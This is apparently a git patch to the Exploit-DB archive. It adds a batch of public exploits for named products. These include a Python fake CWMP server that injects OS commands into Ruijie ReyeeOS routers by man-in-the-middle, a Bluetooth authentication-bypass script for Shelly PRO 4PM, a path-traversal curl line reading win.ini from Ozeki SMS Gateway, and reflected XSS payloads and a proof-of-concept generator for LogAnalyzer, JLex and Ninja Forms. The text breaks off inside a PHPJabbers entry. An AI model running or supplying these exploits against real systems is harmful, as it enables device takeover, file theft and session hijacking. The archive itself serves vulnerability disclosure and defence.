-50993,exploits/php/webapps/50993.txt,"WordPress Plugin Duplicator 1.4.7 - Information Disclosure",2022-08-01,SecuriTrust,webapps,php,,2022-08-01,2022-08-01,0,CVE-2022-2552,,,,,
+50993,exploits/php/webapps/50993.txt,"WordPress Plugin Duplicator 1.4.7 - Information Disclosure",2022-08-01,SecuriTrust,webapps,php,,2022-08-01,2023-08-02,1,CVE-2022-2552,,,,,
 37162,exploits/php/webapps/37162.txt,"WordPress Plugin Dynamic Widgets 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php,,2012-05-15,2015-06-01,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/53513/info
 30063,exploits/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",webapps,php,,2013-12-06,2013-12-06,1,,"WordPress Plugin",,http://www.exploit-db.com/screenshots/idlt30500/screen-shot-2013-12-06-at-111802.png,,
 39553,exploits/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",webapps,php,80,2016-03-11,2016-03-11,0,,"WordPress Plugin",,,,
@@ -33696,7 +33696,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42166,exploits/php/webapps/42166.txt,"WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection",2017-06-03,"Dimitrios Tsagkarakis",webapps,php,,2017-06-13,2017-06-13,0,CVE-2017-9418,,,,,
 21393,exploits/php/webapps/21393.txt,"WordPress Plugin wp-topbar 4.02 - Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",webapps,php,,2012-09-19,2012-09-19,1,OSVDB-85660;OSVDB-85659,"WordPress Plugin",,,http://www.exploit-db.comwp-topbar.4.02.zip,
 50988,exploits/php/webapps/50988.txt,"WordPress Plugin WP-UserOnline 2.87.6 - Stored Cross-Site Scripting (XSS)",2022-07-29,"Steffin Stanly",webapps,php,,2022-07-29,2022-07-29,0,,,,,,
-51020,exploits/php/webapps/51020.txt,"Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)",2022-09-23,UnD3sc0n0c1d0,webapps,php,,2022-09-23,2022-09-23,0,CVE-2022-2941,,,,,
+51020,exploits/php/webapps/51020.txt,"Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)",2022-09-23,UnD3sc0n0c1d0,webapps,php,,2022-09-23,2023-08-02,1,CVE-2022-2941,,,,,
 49377,exploits/php/webapps/49377.txt,"WordPress Plugin WP24 Domain Check 1.6.2 - 'fieldnameDomain' Stored Cross Site Scripting",2021-01-06,"Mehmet Kelepçe",webapps,php,,2021-01-06,2021-01-06,0,,,,,,
 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,,2017-09-27,2017-09-28,0,CVE-2017-14847,,,,,
 42800,exploits/php/webapps/42800.txt,"WordPress Plugin WPCHURCH - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,,2017-09-27,2017-09-28,0,CVE-2017-14845,,,,,

From 010e679abe4a475089bcead41fd857d182d06af9 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Sat, 5 Aug 2023 00:16:32 +0000
Subject: [PATCH 03/17] DB: 2023-08-05

25 changes to exploits/shellcodes/ghdb

ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)

Shelly PRO 4PM v0.11.0 - Authentication Bypass

Ozeki SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)

Academy LMS 6.0 - Reflected XSS

Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting

Campcodes Online Matrimonial Website System v3.3 - Code Execution via malicious SVG file upload

JLex GuestBook 1.6.4 - Reflected XSS

Joomla JLex Review 6.0.1 - Reflected XSS

News Portal v4.0 - SQL Injection (Unauthorized)

PHPJabbers Cleaning Business 1.0 - Reflected XSS

PHPJabbers Night Club Booking 1.0 - Reflected XSS
PHPJabbers Rental Property Booking 2.0 - Reflected XSS
PHPJabbers Service Booking Script 1.0 - Reflected XSS
PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS

PHPJabbers Taxi Booking 2.0 - Reflected XSS
Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)
Webedition CMS v2.9.8.8 - Stored XSS

Webutler v3.2 - Remote Code Execution (RCE)
WordPress adivaha Travel Plugin 2.3 - Reflected XSS
WordPress adivaha Travel Plugin 2.3 - SQL Injection
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR

WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution

WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS

Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)
---
 exploits/hardware/remote/51642.py   | 176 ++++++++++++++++++++++++++++
 exploits/hardware/remote/51657.txt  |  68 +++++++++++
 exploits/multiple/webapps/51646.txt |  19 +++
 exploits/php/webapps/51643.txt      |  24 ++++
 exploits/php/webapps/51644.py       | 158 +++++++++++++++++++++++++
 exploits/php/webapps/51645.txt      |  35 ++++++
 exploits/php/webapps/51647.txt      |  34 ++++++
 exploits/php/webapps/51648.txt      |  24 ++++
 exploits/php/webapps/51649.txt      |  30 +++++
 exploits/php/webapps/51650.txt      |  30 +++++
 exploits/php/webapps/51651.txt      |  32 +++++
 exploits/php/webapps/51652.txt      |  33 ++++++
 exploits/php/webapps/51653.txt      |  33 ++++++
 exploits/php/webapps/51654.txt      |  52 ++++++++
 exploits/php/webapps/51655.txt      |  42 +++++++
 exploits/php/webapps/51656.txt      | 101 ++++++++++++++++
 exploits/php/webapps/51658.txt      |  15 +++
 exploits/php/webapps/51659.txt      |  15 +++
 exploits/php/webapps/51660.txt      |  45 +++++++
 exploits/php/webapps/51661.txt      |  45 +++++++
 exploits/php/webapps/51662.txt      |  58 +++++++++
 exploits/php/webapps/51663.txt      |  35 ++++++
 exploits/php/webapps/51664.txt      | 100 ++++++++++++++++
 exploits/windows/dos/51665.py       |  29 +++++
 files_exploits.csv                  |  26 +++-
 25 files changed, 1258 insertions(+), 1 deletion(-)
 create mode 100755 exploits/hardware/remote/51642.py
 create mode 100644 exploits/hardware/remote/51657.txt
 create mode 100644 exploits/multiple/webapps/51646.txt
 create mode 100644 exploits/php/webapps/51643.txt
 create mode 100755 exploits/php/webapps/51644.py
 create mode 100644 exploits/php/webapps/51645.txt
 create mode 100644 exploits/php/webapps/51647.txt
 create mode 100644 exploits/php/webapps/51648.txt
 create mode 100644 exploits/php/webapps/51649.txt
 create mode 100644 exploits/php/webapps/51650.txt
 create mode 100644 exploits/php/webapps/51651.txt
 create mode 100644 exploits/php/webapps/51652.txt
 create mode 100644 exploits/php/webapps/51653.txt
 create mode 100644 exploits/php/webapps/51654.txt
 create mode 100644 exploits/php/webapps/51655.txt
 create mode 100644 exploits/php/webapps/51656.txt
 create mode 100644 exploits/php/webapps/51658.txt
 create mode 100644 exploits/php/webapps/51659.txt
 create mode 100644 exploits/php/webapps/51660.txt
 create mode 100644 exploits/php/webapps/51661.txt
 create mode 100644 exploits/php/webapps/51662.txt
 create mode 100644 exploits/php/webapps/51663.txt
 create mode 100644 exploits/php/webapps/51664.txt
 create mode 100755 exploits/windows/dos/51665.py

diff --git a/exploits/hardware/remote/51642.py b/exploits/hardware/remote/51642.py
new file mode 100755
index 0000000000..0668cacb00
--- /dev/null
+++ b/exploits/hardware/remote/51642.py
@@ -0,0 +1,176 @@
+# Exploit Title: ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)
+# Google Dork: None
+# Date: July 31, 2023
+# Exploit Author: Riyan Firmansyah of Seclab
+# Vendor Homepage: https://ruijienetworks.com
+# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204
+# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400)
+# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
+# CVE : None
+
+"""
+Summary
+=======
+The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection.
+In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request.
+Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server.
+Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system.
+"""
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+from html import escape, unescape
+import http.server
+import socketserver
+import io
+import time
+import re
+import argparse
+import gzip
+
+# command payload
+command = "uname -a"
+
+# change this to serve on a different port
+PORT = 8080
+
+def cwmp_inform(soap):
+    cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
+    product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1)
+    serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1)
+    result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}}
+    parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap)
+    for parameter in parameters:
+        parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1)
+        parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1)
+        result['parameters'][parameter_name] = parameter_value
+    return result
+
+def cwmp_inform_response():
+    return """<?xml version='1.0' encoding='UTF-8'?>
+<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""
+
+def command_payload(command):
+    current_time = time.time()
+    result = """<?xml version='1.0' encoding='UTF-8'?>
+<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command)
+    return result
+
+def command_response(soap):
+    cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
+    command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1)
+    response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1)
+    result = {'cwmp_id': cwmp_id, 'command': command, 'response': response}
+    return result
+
+class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
+    protocol_version = 'HTTP/1.1'
+    def do_GET(self):
+        self.send_response(204)
+        self.end_headers()
+
+    def do_POST(self):
+        print("[*] Got hit by", self.client_address)
+
+        f = io.BytesIO()
+        if 'service' in self.path:
+            stage, info = self.parse_stage()
+            if stage == "cwmp_inform":
+                self.send_response(200)
+                print("[!] Got Device information", self.client_address)
+                print("[*] Product Class:", info['product_class'])
+                print("[*] Serial Number:", info['serial_number'])
+                print("[*] MAC Address:", info['parameters']['mac'])
+                print("[*] STUN Client IP:", info['parameters']['stunclientip'])
+                payload = bytes(cwmp_inform_response(), 'utf-8')
+                f.write(payload)
+                self.send_header("Content-Length", str(f.tell()))
+            elif stage == "command_request":
+                self.send_response(200)
+                self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly")
+                print("[*] Device interacting", self.client_address)
+                print(info)
+                payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8')
+                f.write(payload)
+                self.send_header("Content-Length", str(f.tell()))
+            else:
+                print("[*] Command response", self.client_address)
+                print(unescape(info['response']))
+                self.send_response(204)
+                f.write(b"")
+        else:
+            print("[x] Received invalid request", self.client_address)
+            self.send_response(204)
+            f.write(b"")
+
+        f.seek(0)
+        self.send_header("Connection", "keep-alive")
+        self.send_header("Content-type", "text/xml;charset=utf-8")
+        self.end_headers()
+        if f:
+            self.copyfile(f, self.wfile)
+            f.close()
+
+    def parse_stage(self):
+        content_length = int(self.headers['Content-Length'])
+        post_data = gzip.decompress(self.rfile.read(content_length))
+        if "cwmp:Inform" in post_data.decode("utf-8"):
+            return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8")))
+        elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"):
+            return ("command_response", command_response(post_data.decode("utf-8")))
+        else:
+            return ("command_request", "Ping!")
+
+    def log_message(self, format, *args):
+        return
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser()
+    parser.add_argument('--bind', '-b', default='', metavar='ADDRESS',
+                        help='Specify alternate bind address '
+                             '[default: all interfaces]')
+    parser.add_argument('port', action='store',
+                        default=PORT, type=int,
+                        nargs='?',
+                        help='Specify alternate port [default: {}]'.format(PORT))
+    args = parser.parse_args()
+
+    Handler = CustomHTTPRequestHandler
+    with socketserver.TCPServer((args.bind, args.port), Handler) as httpd:
+        ip_addr = args.bind if args.bind != '' else '0.0.0.0'
+        print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port))
+        try:
+            httpd.serve_forever()
+        except KeyboardInterrupt:
+            pass
+        httpd.server_close()
+
+
+"""
+Output
+======
+ubuntu:~$ python3 exploit.py
+[!] serving fake CWMP server at 0.0.0.0:8080
+[*] Got hit by ('[redacted]', [redacted])
+[!] Got Device information ('[redacted]', [redacted])
+[*] Product Class: EW1200G-PRO
+[*] Serial Number: [redacted]
+[*] MAC Address: [redacted]
+[*] STUN Client IP: [redacted]:[redacted]
+[*] Got hit by ('[redacted]', [redacted])
+[*] Device interacting ('[redacted]', [redacted])
+Ping!
+[*] Got hit by ('[redacted]', [redacted])
+[*] Command response ('[redacted]', [redacted])
+PING 127.0.0.1 (127.0.0.1): 56 data bytes
+64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms
+64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms
+64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms
+64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms
+
+--- 127.0.0.1 ping statistics ---
+4 packets transmitted, 4 packets received, 0% packet loss
+round-trip min/avg/max = 0.300/0.335/0.400 ms
+Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux
+
+"""
\ No newline at end of file
diff --git a/exploits/hardware/remote/51657.txt b/exploits/hardware/remote/51657.txt
new file mode 100644
index 0000000000..e5c64fa352
--- /dev/null
+++ b/exploits/hardware/remote/51657.txt
@@ -0,0 +1,68 @@
+#!/bin/bash
+
+# Exploit Title: Shelly PRO 4PM v0.11.0 - Authentication Bypass
+# Google Dork: NA
+# Date: 2nd August 2023
+# Exploit Author: The Security Team [exploitsecurity.io]
+# Exploit Blog: https://www.exploitsecurity.io/post/cve-2023-33383-authentication-bypass-via-an-out-of-bounds-read-vulnerability
+# Vendor Homepage: https://www.shelly.com/
+# Software Link: NA
+# Version: Firmware v0.11.0 (REQUIRED)
+# Tested on: MacOS/Linux
+# CVE : CVE-2023-33383
+
+IFS=
+failed=$false
+RED="\e[31m"
+GREEN="\e[92m"
+WHITE="\e[97m"
+ENDCOLOR="\e[0m"
+substring="Connection refused"
+
+
+banner()
+    {
+        clear
+        echo -e "${GREEN}[+]*********************************************************[+]"
+        echo -e "${GREEN}|   Author : Security Team [${RED}exploitsecurity.io${ENDCOLOR}]              |"
+        echo -e "${GREEN}|   Description: Shelly PRO 4PM - Out of Bounds              |"
+        echo -e "${GREEN}|   CVE: CVE-2023-33383                                      |"
+        echo -e "${GREEN}[+]*********************************************************[+]"
+        echo -e "${GREEN}[Enter key to send payload]${ENDCOLOR}"
+    }
+
+banner
+read -s -n 1 key
+if [ "$key" = "x" ]; then
+    exit 0;
+elif [ "$key" = "" ]; then
+    gattout=$(sudo timeout 5 gatttool -b c8:f0:9e:88:92:3e --primary)
+    if [ -z "$gattout" ]; then
+        echo -e "${RED}Connection timed out${ENDCOLOR}"
+        exit 0;
+    else
+    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x000d -n 00000001 >/dev/null 2>&1
+    echo -ne "${GREEN}[Sending Payload]${ENDCOLOR}"
+    sleep 1
+    if [ $? -eq 1 ]; then
+       $failed=$true
+       exit 0;
+    fi
+    sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n ab >/dev/null 2>&1
+    sleep 1
+    if [ $? -eq 1 ]; then
+        $failed=$true
+        echo -e "${RED}[**Exploit Failed**]${ENDCOLOR}"
+        exit 0;
+    else
+       sudo gatttool -b c8:f0:9e:88:92:3e --char-write-req -a 0x0008 -n abcd >/dev/null 2>&1
+       sleep 1
+       for i in {1..5}
+       do
+          echo -ne "${GREEN}."
+          sleep 1
+       done
+       echo -e "\n${WHITE}[Pwned!]${ENDCOLOR}"
+    fi
+fi
+fi
\ No newline at end of file
diff --git a/exploits/multiple/webapps/51646.txt b/exploits/multiple/webapps/51646.txt
new file mode 100644
index 0000000000..aeff179a5f
--- /dev/null
+++ b/exploits/multiple/webapps/51646.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated)
+# Date: 01.08.2023
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://ozeki-sms-gateway.com
+# Software Link:
+https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip
+# Version: 10.3.208
+# Tested on: Windows 10
+
+
+
+##################################### Arbitrary File Read PoC
+#####################################
+
+curl
+https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
+
+##################################### Arbitrary File Read PoC
+#####################################
\ No newline at end of file
diff --git a/exploits/php/webapps/51643.txt b/exploits/php/webapps/51643.txt
new file mode 100644
index 0000000000..f509b89179
--- /dev/null
+++ b/exploits/php/webapps/51643.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting
+# Date: 2023.Aug.01
+# Exploit Author: Pedro (ISSDU TW)
+# Vendor Homepage: https://loganalyzer.adiscon.com/
+# Software Link: https://loganalyzer.adiscon.com/download/
+# Version: v4.1.13 and before
+# Tested on: Linux
+# CVE : CVE-2023-36306
+
+There are several installation method.
+If you installed without database(File-Based),No need to login.
+If you installed with database, You should login with Read Only User(at least)
+
+XSS Payloads are as below:
+
+XSS
+http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
+http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123
+http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
+http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
+http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
+http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
+http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
+http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
\ No newline at end of file
diff --git a/exploits/php/webapps/51644.py b/exploits/php/webapps/51644.py
new file mode 100755
index 0000000000..f4fdda4872
--- /dev/null
+++ b/exploits/php/webapps/51644.py
@@ -0,0 +1,158 @@
+# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)
+# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt
+# Date: 2023-07-27
+# Exploit Author: Mehran Seifalinia
+# Vendor Homepage: https://ninjaforms.com/
+# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip
+# Version: 3.6.25
+# Tested on: Windows 10
+# CVE: CVE-2023-37979
+
+from requests import get
+from sys import argv
+from os import getcwd
+import webbrowser
+from time import sleep
+
+
+# Values:
+url = argv[-1]
+if url[-1] == "/":
+    url = url.rstrip("/")
+
+# Constants
+CVE_NAME = "CVE-2023-37979"
+VULNERABLE_VERSION = "3.6.25"
+
+  # HTML template
+HTML_TEMPLATE = f"""<!DOCTYPE html>
+<!-- Created By Mehran Seifalinia -->
+<html>
+<head>
+  <title>{CVE_NAME}</title>
+  <style>
+    body {{
+      font-family: Arial, sans-serif;
+      background-color: #f7f7f7;
+      color: #333;
+      margin: 0;
+      padding: 0;
+    }}
+    header {{
+      background-color: #4CAF50;
+      padding: 10px;
+      text-align: center;
+      color: white;
+      font-size: 24px;
+    }}
+    .cool-button {{
+      background-color: #007bff;
+      color: white;
+      padding: 10px 20px;
+      border: none;
+      cursor: pointer;
+      font-size: 16px;
+      border-radius: 4px;
+    }}
+    .cool-button:hover {{
+      background-color: #0056b3;
+    }}
+  </style>
+</head>
+<body>
+  <header>
+	Ninja-forms reflected XSS ({CVE_NAME})</br>
+    Created by Mehran Seifalinia
+  </header>
+  <div style="padding: 20px;">
+    <form action="{url}/wp-admin/admin-ajax.php" method="POST">
+      <input type="hidden" name="action" value="nf&#95;batch&#95;process" />
+      <input type="hidden" name="batch&#95;type" value="import&#95;form&#95;template" />
+      <input type="hidden" name="security" value="e29f2d8dca" />
+      <input type="hidden" name="extraData&#91;template&#93;" value="formtemplate&#45;contactformd" />
+      <input type="hidden" name="method&#95;override" value="&#95;respond" />
+      <input type="hidden" name="data" value="Mehran"&#125;&#125;<img&#32;src&#61;Seifalinia&#32;onerror&#61;alert&#40;String&#46;fromCharCode&#40;78&#44;105&#44;110&#44;106&#44;97&#44;45&#44;102&#44;111&#44;114&#44;109&#44;115&#44;32&#44;114&#44;101&#44;102&#44;108&#44;101&#44;99&#44;116&#44;101&#44;100&#44;32&#44;88&#44;83&#44;83&#44;10&#44;67&#44;86&#44;69&#44;45&#44;50&#44;48&#44;50&#44;51&#44;45&#44;51&#44;55&#44;57&#44;55&#44;57&#44;10&#44;45&#44;77&#44;101&#44;104&#44;114&#44;97&#44;110&#44;32&#44;83&#44;101&#44;105&#44;102&#44;97&#44;108&#44;105&#44;110&#44;105&#44;97&#44;45&#41;&#41;>" />
+      <input type="submit" class="cool-button" value="Click here to Execute XSS" />
+    </form>
+  </div>
+  <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>
+  <footer>
+	<a href="https://github.com/Mehran-Seifalinia">Github</a>
+	</br>
+	<a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a
+  </footer>
+</body>
+</html>
+"""
+
+def exploit():
+    with open(f"{CVE_NAME}.html", "w") as poc:
+        poc.write(HTML_TEMPLATE)
+        print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")
+        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")
+        sleep(2)
+        webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")
+
+# Check if the vulnerable version is installed
+def check_CVE():
+    try:
+        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")
+        if response.status_code != 200 or not("Ninja Forms" in response.text):
+            print("[!] Ninja-forms plugin has not installed on this site.")
+            return False
+        else:
+            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]
+            main_version = int(version.split(".")[0])
+            partial_version = int(version.split(".")[1])
+            final_version = int(version.split(".")[2])
+            if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):
+                print(f"[*] Vulnerable Nonja-forms version {version} detected!")
+                return True
+            else:
+                print(f"[!] Nonja-forms version {version} is not vulnerable!")
+                return False
+    except Exception as error:
+        print(f"[!] Error: {error}")
+        exit()
+
+# Check syntax of the script
+def check_script():
+    usage = f"""
+Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]
+
+    OPTIONS:
+        --exploit:  Open a browser and execute the vulnerability.
+    TARGET:
+        An URL starts with 'http://' or 'https://'
+
+Examples:
+    > {argv[0].split("/")[-1]} https://vulnsite.com
+    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com
+"""
+    try:
+        if len(argv) < 2 or len(argv) > 3:
+            print("[!] Syntax error...")
+            print(usage)
+            exit()
+        elif not url.startswith(tuple(["http://", "https://"])):
+            print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")
+            exit()
+        else:
+            for arg in argv:
+                if arg == argv[0]:
+                    print("[*]Starting the script >>>")
+                    state = check_CVE()
+                    if state == False:
+                        exit()
+                elif arg.lower() == "--exploit":
+                    exploit()
+                elif arg == url:
+                    continue
+                else:
+                    print(f"[!] What the heck is '{arg}' in the command?")
+    except Exception as error:
+        print(f"[!] Error: {error}")
+        exit()
+
+if __name__ == "__main__":
+    check_script()
\ No newline at end of file
diff --git a/exploits/php/webapps/51645.txt b/exploits/php/webapps/51645.txt
new file mode 100644
index 0000000000..f0ba08ae05
--- /dev/null
+++ b/exploits/php/webapps/51645.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Joomla JLex Review 6.0.1 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 01/08/2023
+# Vendor: JLexArt
+# Vendor Homepage: https://jlexart.com/
+# Software Link: https://extensions.joomla.org/extension/jlex-review/
+# Demo: https://jlexreview.jlexart.com/
+# Version: 6.0.1
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+Path: /
+
+URL parameter is vulnerable to XSS
+
+https://website/?review_id=5&itwed"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b7yzn=1
+
+
+
+XSS Payloads:
+
+itwed"onmouseover="confirm(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"b7yzn
\ No newline at end of file
diff --git a/exploits/php/webapps/51647.txt b/exploits/php/webapps/51647.txt
new file mode 100644
index 0000000000..db7e08ff0c
--- /dev/null
+++ b/exploits/php/webapps/51647.txt
@@ -0,0 +1,34 @@
+# Exploit Title: JLex GuestBook 1.6.4 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 01/08/2023
+# Vendor: JLexArt
+# Vendor Homepage: https://jlexart.com/
+# Software Link: https://extensions.joomla.org/extension/contacts-and-feedback/guest-book/jlex-guestbook/
+# Demo: https://jlexguestbook.jlexart.com/
+# Version: 1.6.4
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+Path: /u/perry-705
+
+GET parameter 'q' is vulnerable to XSS
+
+http://website/u/perry-705?q=[XSS]&wl=1
+
+
+XSS Payloads:
+
+db8ck"onfocus="confirm(1)"autofocus="xwu0k
\ No newline at end of file
diff --git a/exploits/php/webapps/51648.txt b/exploits/php/webapps/51648.txt
new file mode 100644
index 0000000000..311641dca7
--- /dev/null
+++ b/exploits/php/webapps/51648.txt
@@ -0,0 +1,24 @@
+# Exploit Title: PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 20/07/2023
+# Vendor: PHPJabbers
+# Vendor Homepage: https://www.phpjabbers.com/
+# Software Link: https://www.phpjabbers.com/shuttle-booking-software/
+# Version: 1.0
